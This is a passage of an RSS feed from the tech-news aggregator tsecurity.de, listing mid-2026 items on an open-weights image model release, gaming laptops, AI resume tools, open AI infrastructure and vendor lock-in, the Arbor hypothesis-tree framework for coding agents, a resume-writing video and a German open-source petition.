EU AI Act. </p><p>By releasing Krea 2 Raw and Turbo as open weights, Krea is continuing its expansion from an AI tools provider to being a model provider in its own right.</p><h2><b>An alternative to typical rigid AI imagery APIs?</b></h2><p>Creators are focusing heavily on the structural freedom offered by the unaligned Raw checkpoint, viewing it as an important alternative to the locked-down APIs provided by closed-source models.</p><p>Through the<a href="https://x.com/krea_ai/status/2069435590995812396"> official announcement on X,</a> Krea emphasized the foundational shift this launch represents for open AI workflows.</p><p>Developers note that by treating AI as an "actual creative medium" that feels "raw, flexible, unopinionated, and unconstrained," Krea is intentionally providing an infrastructure that creators can "break if [they] want to," moving far away from the rigid safety guardrails that frequently limit the visual range of competing enterprise tools.</p><p>As independent model builders begin compiling the Hugging Face repositories, the practical value of the release will be determined by how effectively the open-source community can scale customized LoRAs using Krea 2 Raw.</p><p>By providing clear commercial terms and lowering hardware entry barriers via Turbo's 8-step inference pipeline, Krea has introduced a highly competitive alternative to the open-weights market, challenging dominant models by prioritizing artistic control over centralized corporate alignment.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Finding a new PC build without paying a fortune for RAM in this market is a tough task — but MSI's Nvidia-powered laptops are here to save the day]]></title>
<description><![CDATA[I wish new PC builders the best of luck finding affordable options this summer, but these MSI gaming laptops should make the hunt easier.]]></description>
<link>https://tsecurity.de/de/3618171/it-nachrichten/finding-a-new-pc-build-without-paying-a-fortune-for-ram-in-this-market-is-a-tough-task-but-msis-nvidia-powered-laptops-are-here-to-save-the-day/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618171/it-nachrichten/finding-a-new-pc-build-without-paying-a-fortune-for-ram-in-this-market-is-a-tough-task-but-msis-nvidia-powered-laptops-are-here-to-save-the-day/</guid>
<pubDate>Tue, 23 Jun 2026 14:03:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I wish new PC builders the best of luck finding affordable options this summer, but these MSI gaming laptops should make the hunt easier.]]></content:encoded>
</item>
<item>
<title><![CDATA[Beat the Resume Bots With This $39.99 Lifetime Tool]]></title>
<description><![CDATA[This AI resume builder matches your application to each job description and flags missing keywords quickly.
The post Beat the Resume Bots With This $39.99 Lifetime Tool appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3615199/it-nachrichten/beat-the-resume-bots-with-this-3999-lifetime-tool/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615199/it-nachrichten/beat-the-resume-bots-with-this-3999-lifetime-tool/</guid>
<pubDate>Mon, 22 Jun 2026 12:48:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This AI resume builder matches your application to each job description and flags missing keywords quickly.</p>
<p>The post <a href="https://www.techrepublic.com/article/dashresume-lifetime-subscription/">Beat the Resume Bots With This $39.99 Lifetime Tool</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why open infrastructure will define the AI era]]></title>
<description><![CDATA[A new form of vendor lock-in is here. And it’s not proprietary languages or rigid enterprise software suites — it’s something more fundamental. It’s the very thing that writes the code.



JetBrains Research found that 74% of developers worldwide use AI tools. Claude Code, available only since Ma...]]></description>
<link>https://tsecurity.de/de/3614974/ai-nachrichten/why-open-infrastructure-will-define-the-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614974/ai-nachrichten/why-open-infrastructure-will-define-the-ai-era/</guid>
<pubDate>Mon, 22 Jun 2026 11:19:12 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A new form of vendor lock-in is here. And it’s not proprietary languages or rigid enterprise software suites — it’s something more fundamental. It’s the very thing that writes the code.</p>



<p><a href="https://blog.jetbrains.com/research/2026/04/which-ai-coding-tools-do-developers-actually-use-at-work/">JetBrains Research</a> found that 74% of developers worldwide use AI tools. <a href="https://www.infoworld.com/article/4136718/claude-code-is-blowing-me-away.html">Claude Code</a>, available only since May 2025, is now the most popular AI coding tool, followed by <a href="https://www.infoworld.com/article/3829347/review-gemini-code-assist-is-good-at-coding.html">Gemini Code Assist</a> and <a href="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html">GitHub Copilot</a>, according to Jellyfish’s 2026 <a href="https://jellyfish.co/resources/2026-state-of-engineering-management-report/">State of Engineering Management Report</a>.</p>



<p>The latter study also found that 91% of developers say their productivity has increased in the past 12 months. As coding output <a href="https://leaddev.com/ai/openai-says-there-are-easily-1000x-engineers-now">expectations are rewritten daily</a>, the engineering world is becoming heavily reliant on paid external AI services.</p>



<p><a href="https://www.linkedin.com/posts/markwoneill_how-to-optimize-token-consumption-for-ai-activity-7458329480994992128-AT9m?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAAA-8zTABlsmtYe-zC-Uf5z3oD5nm6qXDVVo">Gartner predicts</a> that by 2028 spending on AI coding tokens could exceed developer salaries. Yet, <a href="https://www.infoworld.com/article/4183060/the-tokenmaxxing-backlash-is-coming.html">tokenmaxxing</a> while <a href="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development-how-to-choose.html">vibe coding</a> through a vendor’s cloud-based API feels like a far cry from the open foundations of free programming languages and open models, which many of today’s AI platforms now abstract.</p>



<p>“Open infrastructure will be the backbone of the AI era,” says <a href="https://www.linkedin.com/in/farkasp/">Peter Farkas</a>, CEO of <a href="https://www.percona.com/">Percona</a>, a provider of open-source database solutions. “Right now, too many companies are building their entire AI strategy on top of proprietary platforms because the convenience is seductive.”</p>



<p>“It’s ‘three clicks’ to stand up a database or an AI service in a hyperscaler, and that convenience blinds people to the lock-in they’re signing up for,” he adds. “As AI workloads mature, organizations will realize that depending on one vendor for their data, models, runtime, and pricing is not a strategy.”</p>



<p><a href="https://www.infoworld.com/article/3973969/knowing-when-to-use-ai-coding-assistants.html">AI-assisted coding</a> is democratizing software engineering for non-engineers and <a href="https://leaddev.com/ai/ai-doesnt-create-great-developers-it-amplifies-them">accelerating top performers</a>. But if teams are always working within the confines of how one platform thinks the world should work, it could create locked-in toolsets at scale. And as <a href="https://techcrunch.com/2025/12/29/2025-was-the-year-ai-got-a-vibe-check/">AI platform costs rise</a>, a fundamental question arises: will software developers consume AI on their own terms, or on someone else’s?</p>



<p>There’s a strong case that the long-term winners in tech will be built on open-source standards and foundations, similar to the history of cloud-native computing and the internet itself.</p>



<p>“Open always wins,” says <a href="https://www.linkedin.com/in/brianalvey/">Brian Alvey</a>, CTO at <a href="https://wpvip.com/">WordPress VIP</a>, a managed WordPress hosting platform. “Not because it’s a fancy ideology, but because it gives you total freedom to adapt, evolve, and stay in control.”</p>



<p>Open infrastructure avoids a future where developers perpetually rent. “For AI to be useful to people at large, it can’t be something you’re paying rent for the rest of your life,” says <a href="https://www.linkedin.com/in/maniksurtani/">Manik Surtani</a>, CTO and co-founder of the <a href="https://aaif.io/">Agentic AI Foundation</a> (AAIF), a vendor-neutral home for open-source agentic AI technologies. “And it can’t be concentrated in one particular corporation or a small handful of corporations, because we know how that goes.”</p>



<h2 class="wp-block-heading">Pricey, closed, proprietary AI</h2>



<p>AI development today is traveling two parallel paths. On one path, <a href="https://leaddev.com/technical-direction/be-careful-open-source-ai">open-source AI</a> is thriving and fueling tremendous growth in the number and variety of AI models and tools. Just take the thousands of open-weight models on <a href="https://huggingface.co/">HuggingFace</a>, the community around the <a href="https://openclaw.ai/">OpenClaw</a> AI agent, or the many academic institutions publishing <a href="https://thenewstack.io/llms-can-now-trace-their-outputs-to-specific-training-data/">new breakthroughs</a>.</p>



<p>“Open-source models and tooling are hot on the heels of state-of-the-art, with interesting and boundary-pushing work being shared by labs and researchers across the world,” says Austin Parker, director of AI strategy at <a href="https://www.honeycomb.io/">Honeycomb</a>, an observability platform provider, citing frontier open-source models like <a href="https://mistral.ai/">Mistral</a>, <a href="https://github.com/deepseek-ai/deepseek-v3">DeepSeek</a>, and <a href="https://allenai.org/olmo2">Ai2’s OLMo</a> as examples.</p>



<p>Others agree. “There’s unprecedented openness at the model and tooling layer, with open-source models, frameworks, and orchestration advancing at remarkable speed,” says <a href="https://www.linkedin.com/in/markcollier/">Mark Collier</a>, general manager of AI and infrastructure at the <a href="https://www.linuxfoundation.org/">Linux Foundation</a>.</p>



<p>On the other path, we’re seeing heavy reliance on proprietary AI systems controlled by Anthropic, Cursor, Google, Microsoft, OpenAI, and others. As Collier says, “Many platforms are wrapping those open components in closed, opinionated interfaces that trade short-term speed for long-term constraints.”</p>



<p><a href="https://www.infoworld.com/article/2262355/what-is-open-source-software-open-source-and-foss-explained.html">Open source</a> and the AI tooling market don’t always mix well. LangChain’s <a href="https://github.com/langchain-ai/open-agent-platform">Open Agent Platform</a>, for instance, was open-sourced to much fanfare in 2025, but by 2026 had been deprecated, with the repository now recommending fully managed alternatives.</p>



<p>For <a href="https://www.linkedin.com/in/shaposhnik/">Roman Shaposhnik</a>, co-founder and CTO of <a href="https://nekko.ai/">Ainekko</a>, provider of an open-source, composable AI stack, the current AI platform landscape is reminiscent of <a href="https://devops.com/demystifying-the-low-code-category/">low-code and no-code platforms</a>, which promised democratization of software development but often <a href="https://www.infoworld.com/article/3958483/7-reasons-low-code-and-no-code-tools-fail-to-deliver.html">failed to deliver</a>, becoming synonymous with platform lock-in and inflexibility.</p>



<p>“Honestly, it feels familiar,” Shaposhnik says. “We have incredibly powerful AI tools right now, but most of them come bundled as tightly controlled platforms.” This is a risk for AI, he says, because the infrastructure, models, and hardware are tightly coupled. “If those layers are closed, you lose flexibility fast.”</p>



<p>Some abstractions that sit on top of models, like routing and agent frameworks, tend to be tightly coupled and optimized for certain models. Other platforms take the walled garden concept quite literally. Anthropic, for instance, has repeatedly made headlines for blocking access to its Claude models over <a href="https://www.tomshardware.com/tech-industry/artificial-intelligence/anthropic-nuked-a-companys-access-to-claude-stopping-60-employees-dead-in-their-tracks-support-via-google-form-is-the-only-recourse-for-vague-usage-policy-violation">vague policy violations</a>. The company recently shut off <a href="https://venturebeat.com/technology/anthropic-cracks-down-on-unauthorized-claude-usage-by-third-party-harnesses">competitor xAI’s use</a> and <a href="https://thenewstack.io/anthropic-agent-sdk-confusion/">stonewalled OpenCode</a>, drawing community backlash.</p>



<p>Moves toward increasingly closed systems don’t bode well for an AI economy already built on shaky economics. As <a href="https://www.linkedin.com/in/vikramsrivats/">Vikram Srivats</a>, head of product experience at <a href="https://www.wavemaker.com/">WaveMaker</a>, provider of an agentic application development platform, adds, “Given the unit economics of AI tooling and pace of accelerated change to keep up, it seems obvious that some will evolve to more of a closed system to be able to monetize and gain ROI.”</p>



<h2 class="wp-block-heading">Why openness matters in the AI era</h2>



<p>Reliance on proprietary AI platforms can create long-term operational dependencies. As systems become less interoperable, organizations may be forced to standardize on a single stack across data pipelines, models, and decision logic, says the Linux Foundation’s Collier.</p>



<p>“As infrastructure consolidates, enterprises become more exposed when platforms change direction, raise prices, or fall behind technically,” he says. “If you can’t change platforms without re-architecting your AI systems, you’ve already given up too much control.”</p>



<p>“When you build on someone else’s platform, you have to live by their rules and those rules always change,” adds WordPress VIP’s Alvey. “We’ve all seen this before, businesses wasting time and money building to serve Google, Facebook, YouTube, and the App Store, instead of building to serve their customers.”</p>



<p><a href="https://www.infoworld.com/article/2337012/get-used-to-cloud-vendor-lock-in.html">Platform lock-in</a> can also create direct business risk. As Ainekko’s Shaposhnik says, “It usually shows up as higher costs, fragile systems, and growing risk when it’s time to change direction.”</p>



<p>At Ainekko, an internal group called the <a href="https://www.eejournal.com/article/do-you-want-to-be-an-ai-plumber/">AI Plumbers</a> focuses on back-end AI infrastructure like inference, scheduling, memory, and hardware integration. “Their view is simple,” says Shaposhnik. “If those layers are closed, everything above them becomes fragile.”</p>



<p>Open standards, interfaces, and infrastructure provide a necessary hedge against closed systems to prevent this sort of fragility. “In the AI era, open infrastructure gives enterprises control, portability, and choice at exactly the time they need it most,” says Percona’s Farkas.</p>



<p>It can cost upwards of $100,000 to migrate enterprise software, <a href="https://cloudaware.com/blog/cloud-migration-costs/">according to Cloudaware</a>, making portability a major enterprise concern. From this perspective, procuring closed systems can become a costly architectural dependency.</p>



<p>Others argue that openness is a critical hedge against vendor concentration risks at large, especially if AI replaces human labor en masse. “If all of that economic value is now being concentrated in the hands of one or two companies,” says the AAIF’s Surtani, “that’s an order of magnitude bigger problem than we’ve seen in any other wave of computing.”</p>



<p>Instead, open foundations allow adaptability to evolving conditions so enterprises can swap out models, agents, data, hardware, and orchestration, as needed. “Open standards let those components change independently without breaking the system,” says Collier. </p>



<p>Openness can also help future-proof businesses against economic upheaval. “Open everything will help build a cushion for businesses and users to survive and thrive after the almost-certain correction in the current hype cycle,” says WaveMaker’s Srivats.</p>



<h2 class="wp-block-heading">Momentum toward open AI infrastructure</h2>



<p>At the industry level, momentum toward open AI infrastructure is growing. The <a href="https://www.linuxfoundation.org/press/linux-foundation-announces-the-formation-of-the-agentic-ai-foundation">establishment</a> of the <a href="https://aaif.io/author/aaif/">Agentic AI Foundation</a>, Anthropic’s donation of <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP), and Block’s donation of its <a href="https://aaif.io/projects/goose/">Goose agent</a> are significant ecosystem-wide moves toward openness. Other advances include the donation of <a href="https://thenewstack.io/llm-d-cncf-kubernetes-inference/">llm-d</a>, a <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes</a> framework for LLM inference, to the Cloud Native Computing Foundation (CNCF).</p>



<p>For Parker, donations like this help ensure long-term support and care. “Open standards aren’t just the foundation of the internet, they’re the foundation of the AI space,” he says. “I predict that we’ll see these practices continue, especially as enterprise adoption increases in earnest,” he adds.</p>



<p>Still, some question whether this level of stewardship is enough for a rapidly evolving ecosystem. “The internet benefited early on from groups that helped keep vendors aligned,” says Shaposhnik. “In AI infrastructure, we don’t really have that yet.”</p>



<p>“All of us open source veterans are hopeful,” he says, “but we also need to adapt to this new reality in what we do regarding AI infrastructure.”</p>



<p>Beyond industry governing bodies, companies themselves are also spearheading open AI initiatives. Warp, an agentic development environment, recently <a href="https://thenewstack.io/warp-open-source-client/">went open source</a> amid closed-source rivals. Arcade.dev, meanwhile, is pushing an open-source <a href="https://www.arcade.dev/blog/agent-library/">Agent Library</a> for agentic memory.</p>



<h2 class="wp-block-heading">Where openness matters most in the AI stack</h2>



<p>While AI infrastructure can be open in many ways, a few layers stand out as especially important. First is the openness of the model itself. “Open-source models must be the foundation of future trust and value,” says WaveMaker’s Srivats.</p>



<p>“The forms of open infrastructure that reduce integration friction and accelerate adoption stand out,” adds <a href="https://www.linkedin.com/in/neeraj-abhyankar-9040141/">Neeraj Abhyankar</a>, VP of data and AI at <a href="https://www.rsystems.com/">R Systems</a>, a global digital solutions provider. For him, open model representation formats, open orchestration and execution layers, open agentic protocols, and open governance and metadata standards are all essential for enterprise flexibility.</p>



<p>Others place more value on the connective tissue between AI components. “The most important forms of open infrastructure are the ones that connect systems together,” says Collier. “That includes open APIs, metadata standards, identity and policy frameworks, and protocols for how models and agents communicate.” </p>



<p>Arguably, <a href="https://www.infoworld.com/article/4096223/10-mcp-servers-for-devops.html">MCP</a> has become the connective tissue between AI agents and the <a href="https://thenewstack.io/how-to-prepare-your-api-for-ai-agents/">broader API ecosystem</a>. “If we get MCP right we unlock the same level of interoperability between entities on the web and models driving them as we came to enjoy during the Web 2.0 era and the API-first boom,” says Shaposhnik. “If we don’t we risk massive proprietary lock-ins.”</p>



<p>Parker agrees that open protocols will underlie future AI progress. “We’ll see continued development and progress on AI agents which will rely on protocols like MCP and ACP [<a href="https://www.infoworld.com/article/4007686/a-developers-guide-to-ai-protocols-mcp-a2a-and-acp.html">Agent Client Protocol</a>] to interoperate with various clients and each other,” he says. Yet a gap remains around API conventions for models. “It would be nice if we could get a commitment from model providers to use a standard here.”</p>



<p>For the AAIF’s Surtani, opening up the protocol layer is the most important aspect. “I think it’s really important for interoperability, for choice,” he says. “It means you can bring your own agent, you can bring your own framework, you can bring your own harness, and pick what model you want.”</p>



<p>Open standards may also play a significant role within <a href="https://www.infoworld.com/article/4117620/edge-ai-the-future-of-ai-inference-is-smarter-local-compute.html">inference architecture</a>. “As AI expands to the edge, developers need visibility into how models run, how memory is used, and how performance scales,” says Shaposhnik. Open systems could make it easier to optimize, debug, and adapt while helping enterprises avoid observability fragmentation.</p>



<p>Lastly, <a href="https://www.infoworld.com/article/3498485/the-future-of-kubernetes-and-cloud-infrastructure.html">cloud-native architectural standards</a> are a key ingredient for open AI infrastructure. “We’re seeing Kubernetes become the missing link for people who want the hyperscaler-style convenience without hyperscaler lock-in,” says Percona’s Farkas. For him, Kubernetes has become the de facto hybrid enterprise deployment option for data, workloads, and AI components.</p>



<h2 class="wp-block-heading">History repeats itself</h2>



<p>The <a href="https://opensource.org/blog/the-2026-state-of-open-source-report">2026 State of Open Source Report</a> found avoiding vendor lock-in to be the primary driver of open source adoption. But beyond being a strategic decision for a single company, open infrastructure provides a layer for entire industries to be built upon.</p>



<p>Arguably, the internet itself is evidence of this, where groups like the <a href="https://www.ietf.org/">IETF</a> and the <a href="https://www.ieee.org/">IEEE</a> were instrumental in defining the fundamental protocols. “Without open protocols we would’ve been in telco hell and without phenomenons like Google or Facebook,” says Shaposhnik.</p>



<p>Or, take the <a href="https://www.infoworld.com/article/2335646/thirty-two-years-of-linux-and-its-community.html">history of Linux</a> as a parallel. “Linux became the default operating system because it offered a common, vendor-neutral foundation that everyone could build on,” says Collier. “In the AI era, open infrastructure will define the layers that organizations rely on for long-term continuity.”</p>



<p>At the infrastructure level, open standards have repeatedly underpinned major platform shifts, from <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Docker</a> to <a href="https://www.infoworld.com/article/3812622/will-kubernetes-ever-get-easier.html">Kubernetes</a>. The question now is whether AI will develop a similarly durable standards layer.</p>



<p>For Parker, it’s too early to say, but the current growth of AI mirrors the early cloud. “Remember that it took many years before we saw the development and popularization of the open source cloud-native ecosystem,” he says. “I think it would be a mistake to extrapolate from the current trajectory towards a closed, proprietary future.”</p>



<p>Others agree the future must be rooted in openness. “I see open infrastructure becoming the foundation of enterprise AI,” says R Systems’s Abhyankar. “As systems become more distributed and agent‑driven, closed ecosystems simply won’t scale.”</p>



<p>The groundwork is being laid through open agentic protocols, open frameworks, and industry support intended to reduce fragmentation around proprietary standards.</p>



<p>“Ironically, the AI movement has mostly seemed to learn from the mistakes of the past and is starting off on a more open foot,” says Parker. “Over time, I believe we’ll see innovation and openness thrive.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA['What makes a CV stand out is the personal touch you add to it': Even professional CV writers are warning not to use AI to write a resume]]></title>
<description><![CDATA[Perfect text, exaggerated skills and inaccurate information are telltale signs of AI-generated resumes, but there are benefits.]]></description>
<link>https://tsecurity.de/de/3611481/it-nachrichten/what-makes-a-cv-stand-out-is-the-personal-touch-you-add-to-it-even-professional-cv-writers-are-warning-not-to-use-ai-to-write-a-resume/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611481/it-nachrichten/what-makes-a-cv-stand-out-is-the-personal-touch-you-add-to-it-even-professional-cv-writers-are-warning-not-to-use-ai-to-write-a-resume/</guid>
<pubDate>Sat, 20 Jun 2026 02:17:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Perfect text, exaggerated skills and inaccurate information are telltale signs of AI-generated resumes, but there are benefits.]]></content:encoded>
</item>
<item>
<title><![CDATA[Researchers grow a hypothesis tree for AI coding agents]]></title>
<description><![CDATA[AI coding agents can tend to isolate research, running experiments and generating ideas that are then forgotten when context windows reset. This can waste tokens, as models then repeat the same mistakes and hit the same dead ends.



But new research argues that it’s not the model itself, but the...]]></description>
<link>https://tsecurity.de/de/3611377/ai-nachrichten/researchers-grow-a-hypothesis-tree-for-ai-coding-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611377/ai-nachrichten/researchers-grow-a-hypothesis-tree-for-ai-coding-agents/</guid>
<pubDate>Sat, 20 Jun 2026 00:18:27 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI coding agents can tend to isolate research, running experiments and generating ideas that are then forgotten when context windows reset. This can waste tokens, as models then repeat the same mistakes and hit the same dead ends.</p>



<p>But new research argues that it’s not the model itself, but the overarching ‘tree,’ that needs tweaking. To that end, data scientists from the Gaoling School of Artificial Intelligence, Renmin University of China, and Microsoft Research have introduced <a href="https://arxiv.org/pdf/2606.11926" target="_blank" rel="noreferrer noopener">Arbor</a>, a “persistent hypothesis tree” that helps agents remember and refine learnings over long research sessions.</p>



<p>A long-lived coordinator manages research strategy across the tree, while short-lived executors spin up isolated worktrees to test different hypotheses. As results come back, the tree updates, narrowing and refining throughout experimentation.</p>



<p>In practical tests, this technique delivered more than two-fold performance gains over standard <a href="https://www.cio.com/article/411198/how-to-launch-your-ai-projects-from-pilot-to-production-and-ensure-success.html" target="_blank">AI coding agents</a> across real-world engineering tasks, for the same budget.</p>



<p>This is because, said <a href="https://www.infotech.com/profiles/mahmoud-ramin" target="_blank" rel="noreferrer noopener">Mahmoud Ramin</a>, a research director at Info-Tech Research Group, “Arbor accumulates information over time and allows agents to build upon prior discoveries just as humans do, through learning, adaptation, and eventually building upon what they have learned in the past.”</p>



<h2 class="wp-block-heading">How Arbor grows</h2>



<p>Arbor’s builders argued that longer execution on its own does not guarantee research progress. The challenge is maintaining a state that turns many individual attempts into “cumulative hypothesis refinement.”</p>



<p>Further, progress should not depend on human overseers regularly stepping in to dictate logical next steps or interpret the meaning of previous trials, they noted. To be truly autonomous, agentic research frameworks must maintain connections between experiments, data, results, and failures over time.</p>



<p>Arbor is built to fulfill three system requirements. First, it must be able to branch as sub-trees test out competing hypotheses that are all potentially plausible. At the same time, unrestricted branching can degenerate the whole framework, so that must be controlled to remain organized. The researchers call this “branching with coherence.”</p>



<p>Second, the infrastructure must separate local execution from overarching strategy. Testing out single hypotheses requires short-horizon tasks like editing, debugging, and evaluation. But these should not “obscure” the larger tree making decisions based on evidence gathered across the whole run.</p>



<p>Finally, the systems must be able to distinguish exploratory improvement from verified improvement. This prevents AI from overfitting during trial-and-error instead of iteratively learning from underlying patterns.</p>



<p>Persistence is at the core; the tree links hypotheses and ideas, the <a href="https://www.infoworld.com/article/4187057/ai-coding-agents-may-be-getting-bad-instructions-from-smelly-config-files.html" target="_blank">code or configuration artifacts</a> used to test them, experimental evidence (results, metrics), and distilled insights (such as “this data filter helped, but this learning rate scheduler didn’t”).</p>



<p>Once a project kicks off, shorter-execution work trees run code, log their work, and collect metrics. The long-lived coordinator above them serves as the de-facto head of research, keeping an eye on the process, updating nodes, selecting “promising leaves,” pruning or merging branches, propagating reusable lessons, and deciding which hypotheses to pursue next.</p>



<p>“The tree therefore acts as the operational research state of the system,” Arbor’s builders wrote. “It is simultaneously the search frontier, the memory of past attempts, and the audit trail for verified artifact improvement.”</p>



<h2 class="wp-block-heading">Outperforming Codex and Claude on new data</h2>



<p>To test how well this process works, the researchers evaluated Arbor in an autonomous optimization (AO) setting: the agent was given an initial research artifact (a data pipeline, harness, or training script) and was tasked with improving its “held-out performance” through iterative experimentation, without human steering. Held-out performance is a machine learning (ML) metric that evaluates how well models are able to generalize on data they haven’t seen before.</p>



<p>The tree-based architecture was tested on several real research tasks across model training (its ability to improve training recipes and hyperparameters), harness engineering (how well it can upgrade evaluation or training harnesses), and data synthesis (its capacity to generate better data for training or evals).</p>



<p>Ultimately, Arbor outperformed the average held-out gains of Codex and Claude Code by 2.5x, for the same resource budget.</p>



<p>The takeaway, said the researchers: Keeping a structured, evolving hypothesis tree yields greater performance improvements than running the same models as ‘memoryless’ coding agents.</p>



<p>Arbor’s most innovative feature is its ability to maintain the agent’s memory and retain relevant data from prior attempts and hypotheses, Info-Tech’s Ramin pointed out, and, he said, “the next step for <a href="https://www.cio.com/article/4185912/why-agentic-architecture-is-still-so-puzzling.html" target="_blank">autonomous agents</a> may be accumulating evidence over time.”</p>



<p>However, this does raise concerns about the auditability of robust research environments at a large scale, he noted. “As autonomous agents become more capable of performing work without human operators overseeing them, enterprises will need transparency into how and/or why an agent took a specific action or reached a certain conclusion.”</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Soft Skills for the Job Market: Resume Writing]]></title>
<description><![CDATA[Author: The Cyber Mentor - Bewertung: 8x - Views:61 https://www.tcm.rocks/ss-y - Find the full and FREE Soft Skills for the Job Market course in the TCM Security Academy. It's one of the several courses featured in our free tier. 

https://www.tcm.rocks/acad-summer-y - We're hosting our annual Su...]]></description>
<link>https://tsecurity.de/de/3610917/it-security-video/soft-skills-for-the-job-market-resume-writing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610917/it-security-video/soft-skills-for-the-job-market-resume-writing/</guid>
<pubDate>Fri, 19 Jun 2026 18:18:20 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: The Cyber Mentor - Bewertung: 8x - Views:61 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/glrv4p-NvUw?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>https://www.tcm.rocks/ss-y - Find the full and FREE Soft Skills for the Job Market course in the TCM Security Academy. It's one of the several courses featured in our free tier. <br />
<br />
https://www.tcm.rocks/acad-summer-y - We're hosting our annual Summer Sale this month! Up until June 15th, grab 50% off your first membership to the TCM Security Academy (use the code CAMPTCM to redeem) and 20% off certifications and live trainings. <br />
<br />
We're releasing our Soft Skills for the Job Market course all FREE on YouTube! This course can also be found in the TCM Security Academy. <br />
<br />
Module Two of the Soft Skills course covers resume writing - which can be tedious and frustrating, but there are some ways you can craft a polished resume that will help you get noticed by hiring managers and recruiters. 🔥<br />
<br />
Get a copy of the TCM Security resume template here to help you in your job searching journey: https://www.tcm.rocks/resume-template <br />
<br />
More modules will be dripped out here in the near future! Comment below and let us know your thoughts on what the most underrated soft skill is.<br />
<br />
Attending #DEFCON this summer? Make sure you drop by Noob Village to get your resume professionally reviewed and attend a talk on resume best practices from a member of the TCM Security team!<br />
<br />
#resume #resumetemplate #resumetips #softskills #freecourse <br />
<br />
Sponsor a Video: https://www.tcm.rocks/Sponsors<br />
Pentests & Security Consulting: https://tcm-sec.com<br />
Get Trained: https://www.tcm.rocks/acad-y<br />
Get Certified: http://www.tcm.rocks/certs-y<br />
Merch: https://www.bonfire.com/store/tcm-security/<br />
<br />
📱Social Media📱<br />
___________________________________________<br />
X: https://x.com/TCMSecurity<br />
Twitch: https://www.twitch.tv/thecybermentor<br />
Instagram: https://www.instagram.com/tcmsecurity/<br />
LinkedIn: https://www.linkedin.com/company/tcm-security-inc/<br />
TikTok: https://www.tiktok.com/@tcmsecurity<br />
Discord: https://discord.gg/tcm<br />
Facebook: https://www.facebook.com/tcmsecure<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Open Soure braucht DEINE Hilfe - Petition für Open Source im Ehrenamt]]></title>
<description><![CDATA[Author: Linux Guides - Bewertung: 40x - Views:108 Open Source Software hält die digitale Welt am Laufen, doch die Arbeit wird oft von unbezahlten Hobbyentwicklern getan. Eine Anerkennung als Ehrenamt würde diese Arbeit endlich mit der Jugendarbeit oder dem Engagement in einem Sportverein gleichse...]]></description>
<link>https://tsecurity.de/de/3610654/linux-tipps/open-soure-braucht-deine-hilfe-petition-fuer-open-source-im-ehrenamt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610654/linux-tipps/open-soure-braucht-deine-hilfe-petition-fuer-open-source-im-ehrenamt/</guid>
<pubDate>Fri, 19 Jun 2026 16:25:22 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Linux Guides - Bewertung: 40x - Views:108 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/oeigSqbvBOQ?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Open Source Software hält die digitale Welt am Laufen, doch die Arbeit wird oft von unbezahlten Hobbyentwicklern getan. Eine Anerkennung als Ehrenamt würde diese Arbeit endlich mit der Jugendarbeit oder dem Engagement in einem Sportverein gleichsetzen.<br />
<br />
Unterschreibe für die Anerkennung von Open-Source-Arbeit als Ehrenamt: https://www.openpetition.de/petition/online/anerkennung-von-open-source-arbeit-als-ehrenamt-in-deutschland<br />
<br />
Wenn Du das Video unterstützen willst, dann gib bitte eine Bewertung ab, und schreibe einen Kommentar. Vielen Dank!<br />
<br />
Links:<br />
-------------------------------------<br />
- Direkt unterschreiben: https://www.openpetition.de/petition/online/anerkennung-von-open-source-arbeit-als-ehrenamt-in-deutschland<br />
- Über die Petition: https://www.ehrenamt-opensource.de/<br />
